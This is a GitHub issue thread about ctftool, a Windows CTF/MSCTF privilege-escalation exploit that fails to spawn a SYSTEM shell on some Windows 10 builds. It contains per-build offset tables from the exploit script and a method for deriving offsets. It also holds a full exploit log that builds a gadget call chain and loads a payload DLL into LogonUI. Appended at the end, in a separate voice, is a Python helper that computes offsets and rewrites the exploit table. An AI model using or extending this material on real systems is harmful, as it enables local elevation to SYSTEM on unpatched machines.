No cmd spawned on Win 10 Enterprise 1809 #9

Open
mattwhatkins opened this issue Aug 14, 2019 · 13 comments

Comments

@mattwhatkins

I'm experimenting with this in a corporate environment, but I can't seem to get a cmd shell spawned. Apologies if I'm missing something trivial.

Host is a Win10 VM Enterprise 1809 running in VMWare. Latest updates are from the 6th July.

Testing with the ctf-consent-system.ctf, ctf-exploit-common-win10.ctf and ctf-logonui-system.ctf fails to result in a shell being spawned, yet the output shows Exploit complete. Checking process explorer, there are no new cmd.exe processes running in other sessions/hidden.

Is this expected to work or am I missing something? What's the best way to go about debugging this?

@cloudsbyzeus

Having the same experience with this.

@KillaEslieBee

On a test machine I had the same problem. I edited the ctf-exploit-common-win10.ctf
and in my case the offset (not certain if I used the correct term for it!) used for 1903 also worked for my test machine. So I replaced the offset with the offset from 1903 -> 480 and put it in the right spot. Saved the file and now the stuff is working.

If it doesn't work, try tinkering with that value for your build; for my 1803, offset 480 worked perfectly.

set r0 1903
eq r0 regval
repeat r0 set r3 480

set r0 1809
eq r0 regval
repeat r0 set r3 496

set r0 1803
eq r0 regval
repeat r0 set r3 480

set r0 1709
eq r0 regval
repeat r0 set r3 452

set r0 1703
eq r0 regval
repeat r0 set r3 401

@taviso
Owner

taviso commented Aug 15, 2019

Thanks for the bug report, can you paste the output you see?

Also, can you find the version of MSCTF.DLL?

I did test it on 1809, but it might be a different patchlevel I didn't check...

@cloudsbyzeus

Hi @KillaEslieBee @taviso

I am also testing with 1809, and I tried different values with no success. What is your recommendation to identify what is the correct value to use here?

@taviso
Owner

taviso commented Aug 15, 2019

If you tell me the version of MSCTF.DLL you have, I can check.

@cloudsbyzeus

@taviso, version is 10.0.17763.529

@taviso
Owner

taviso commented Aug 15, 2019

I just took a look at that version, the correct offset is 496 - which should be automatically matched to 1809.

(To find the offset, I just subtract the pointer to CTIPProxy::Reconvert in the CTIPProxy vtable from the base of the CStubIEnumTfInputProcessorProfiles::_StubTbl, and divide by 8).

Can you show the full output from the exploit, it must be some other problem.

@cloudsbyzeus

Microsoft Defender just caught it as:
HackTool:Win32/CTFExtool

@cloudsbyzeus

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault3
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault3") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault3, Handle 00000224
ctf> scan
Client 0, Tid 16156 (Flags 0x08, Hwnd 00003F1C, Pid 12924, explorer.exe)
Client 1, Tid 3140 (Flags 0x08, Hwnd 00000C44, Pid 12924, explorer.exe)
Client 2, Tid 14272 (Flags 0x08, Hwnd 000037C0, Pid 12924, explorer.exe)
Client 3, Tid 3908 (Flags 0x08, Hwnd 00000F44, Pid 12924, explorer.exe)
Client 4, Tid 9076 (Flags 0x08, Hwnd 00002374, Pid 12924, explorer.exe)
Client 5, Tid 248 (Flags 0x0c, Hwnd 000000F8, Pid 12924, explorer.exe)
Client 6, Tid 3408 (Flags 0x08, Hwnd 00000D50, Pid 12924, explorer.exe)
Client 7, Tid 9408 (Flags 0x08, Hwnd 000024C0, Pid 12924, explorer.exe)
Client 8, Tid 7472 (Flags 0x08, Hwnd 00001D30, Pid 12924, explorer.exe)
Client 9, Tid 5828 (Flags 0x08, Hwnd 000016C4, Pid 12924, explorer.exe)
Client 10, Tid 9376 (Flags 0x08, Hwnd 000024A0, Pid 12924, explorer.exe)
Client 11, Tid 15456 (Flags 0x0c, Hwnd 00003C60, Pid 9872, ShellExperienceHost.exe)
Client 12, Tid 1272 (Flags 0x0c, Hwnd 000004F8, Pid 908, SearchUI.exe)
Client 13, Tid 1128 (Flags 0x0c, Hwnd 00000468, Pid 908, SearchUI.exe)
Client 14, Tid 12252 (Flags 0x08, Hwnd 00002FDC, Pid 10216, ApplicationFrameHost.exe)
Client 15, Tid 7620 (Flags 0x08, Hwnd 00001DC4, Pid 10216, ApplicationFrameHost.exe)
Client 16, Tid 11020 (Flags 0x0c, Hwnd 00002B0C, Pid 16600, MicrosoftEdge.exe)
Client 17, Tid 7792 (Flags 0x0c, Hwnd 00001E70, Pid 6892, MicrosoftEdgeCP.exe)
Client 18, Tid 3712 (Flags 0000, Hwnd 00000E80, Pid 13328, ctfmon.exe)
Client 19, Tid 572 (Flags 0x08, Hwnd 0000023C, Pid 5152, FF_Protection.exe)
Client 20, Tid 7504 (Flags 0x08, Hwnd 00001D50, Pid 14036, OneDrive.exe)
Client 21, Tid 12616 (Flags 0x0c, Hwnd 00003148, Pid 212, LockApp.exe)
Client 22, Tid 2216 (Flags 0x08, Hwnd 000008A8, Pid 9704, Taskmgr.exe)
Client 23, Tid 13516 (Flags 0x08, Hwnd 000034CC, Pid 4828, regedit.exe)
Client 24, Tid 12140 (Flags 0x0c, Hwnd 00002F6C, Pid 10984, SecHealthUI.exe)
Client 25, Tid 10924 (Flags 0x0c, Hwnd 00002AAC, Pid 15200, MicrosoftEdgeCP.exe)
Client 26, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 27, Tid 13204 (Flags 0x08, Hwnd 00003394, Pid 7436, conhost.exe)
ctf> script .\scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
Overwrite C:\TEMP\EXPLOIT.DLL (Yes/No/All)? a
C:payload64.dll
1 File(s) copied
The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 00000224...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 0000023C
Client 0, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 1, Tid 11904 (Flags 0x1000000c, Hwnd 00002E80, Pid 15592, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 11904
ReleaseId is 1809
Guessed msvcrt => C:\Windows\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x31140
C:\Windows\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\Windows\system32\kernel32.DLL->.data->VirtualAddress is 0x0a9000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 000E04F0, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C
000010: 01 00 00 00 dc ff 65 4e ......eN
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x4e65ffdc
0x7ffe32320000
0x7ffe2f640000
0x7ffe30240000
Guessed msctf => C:\Windows\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xb9cc0
C:\Windows\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffe2f640000
Guessed kernel32 => C:\Windows\system32\kernel32.DLL
C:\Windows\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1f220
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffe30740000
Guessed combase => C:\Windows\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1eaac0
C:\Windows\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

ctf>

@taviso
Owner

taviso commented Aug 15, 2019

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

@jgrotter

> Microsoft Defender just caught it as:
> HackTool:Win32/CTFExtool

+1 - MS Security just started flagging/deleting

@cloudsbyzeus

> Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?
>
> The only thing I can think of is there are some group policy settings that change how the loginui one works.

Yes, in both cases a cmd is not spawned. It's a default install. Don't think it has anything special.

@Knallkoppon

I'm on Windows 10 Enterprise 1709. Doesn't work. I think it is caused by the Extended Support of the Enterprise Versions. My MSCTF.DLL is on version 10.0.16299.696. I didn't understand how to calculate the offset.
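Two things keep coming up in this thread: the formula taviso gives for deriving the vtable offset (subtract the address of the CTIPProxy::Reconvert slot in the CTIPProxy vtable from the base of CStubIEnumTfInputProcessorProfiles::_StubTbl, divide by 8) and the hand edit of the ReleaseId -> offset table in ctf-exploit-common-win10.ctf that KillaEslieBee describes. The following is an added example written for this page; it is not ctftool's code and not from any commenter. It assumes the table keeps the exact three-line shape posted above (`set r0 N` / `eq r0 regval` / `repeat r0 set r3 N`), the two symbol addresses are read from a debugger or disassembler with matching symbols for the MSCTF.DLL build in question, and every address and the sample table in the block are constructed test input, not values from a real build.

```python
"""Added example for the ctftool issue thread (not ctftool's own code).

stub_offset()  applies the formula from taviso's reply to two symbol
               addresses read from a debugger/disassembler.
set_offset()   edits or adds the `repeat r0 set r3 N` entry for a ReleaseId
               in the .ctf script text instead of patching it by hand.
"""
import re

PTR_SIZE = 8  # 64-bit MSCTF.DLL, hence "divide by 8" in the thread


def stub_offset(reconvert_slot: int, stubtbl_base: int, ptr_size: int = PTR_SIZE) -> int:
    """Pointer-slot distance between the two symbols, per the thread's formula.

    reconvert_slot: address of the CTIPProxy::Reconvert pointer in the CTIPProxy vtable
    stubtbl_base:   address of CStubIEnumTfInputProcessorProfiles::_StubTbl
    Both must come from the same image (same load base or both RVAs); only the
    difference matters. The magnitude is returned because the table entries
    are positive indices; the wording "subtract the slot from the base" gives
    a positive value directly when _StubTbl follows the vtable.
    """
    delta = stubtbl_base - reconvert_slot
    if delta % ptr_size:
        raise ValueError(f"addresses are not {ptr_size}-byte aligned relative to each other")
    return abs(delta) // ptr_size


# One entry of the table exactly as posted in the thread (three lines).
ENTRY_RE = re.compile(
    r"^set r0 (?P<rel>\d+)\n"
    r"^eq r0 regval\n"
    r"^repeat r0 set r3 (?P<off>\d+)$",
    re.MULTILINE,
)


def parse_offset_table(script: str) -> dict:
    """Map ReleaseId -> r3 offset for every entry found in the script text."""
    return {int(m["rel"]): int(m["off"]) for m in ENTRY_RE.finditer(script)}


def set_offset(script: str, release_id: int, offset: int) -> str:
    """Return the script with release_id's entry set to offset.

    An existing entry is edited in place; a missing one is appended after the
    last entry (or at the end of the text if there is no table yet).
    """
    if offset < 0:
        raise ValueError("offset must be a non-negative slot index")
    entries = list(ENTRY_RE.finditer(script))
    for m in entries:
        if int(m["rel"]) == release_id:
            return script[: m.start("off")] + str(offset) + script[m.end("off"):]
    entry = f"set r0 {release_id}\neq r0 regval\nrepeat r0 set r3 {offset}"
    if entries:
        end = entries[-1].end()
        return script[:end] + "\n\n" + entry + script[end:]
    prefix = script.rstrip("\n")
    return prefix + ("\n\n" if prefix else "") + entry + "\n"


# Constructed test input: the table as it appears earlier in this thread.
SAMPLE_TABLE = """\
set r0 1903
eq r0 regval
repeat r0 set r3 480

set r0 1809
eq r0 regval
repeat r0 set r3 496

set r0 1803
eq r0 regval
repeat r0 set r3 480

set r0 1709
eq r0 regval
repeat r0 set r3 452

set r0 1703
eq r0 regval
repeat r0 set r3 401
"""

if __name__ == "__main__":
    # Constructed addresses (RVAs), placed 496 pointers apart to mirror the
    # value taviso reports for MSCTF.DLL 10.0.17763.529 (1809).
    vtable_slot = 0xC0000
    stub_table = vtable_slot + 496 * PTR_SIZE
    off = stub_offset(vtable_slot, stub_table)
    print("computed offset:", off)
    print(set_offset(SAMPLE_TABLE, 1809, off))
```

To answer the version question taviso asks before touching the table, the file version of MSCTF.DLL is in the DLL's Properties > Details tab in Explorer, or from PowerShell with `(Get-Item C:\Windows\System32\msctf.dll).VersionInfo.FileVersion`. Pass the two symbol addresses for that build into `stub_offset`, then write the result into a copy of the script with `set_offset` rather than editing the `repeat r0 set r3` line by hand.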
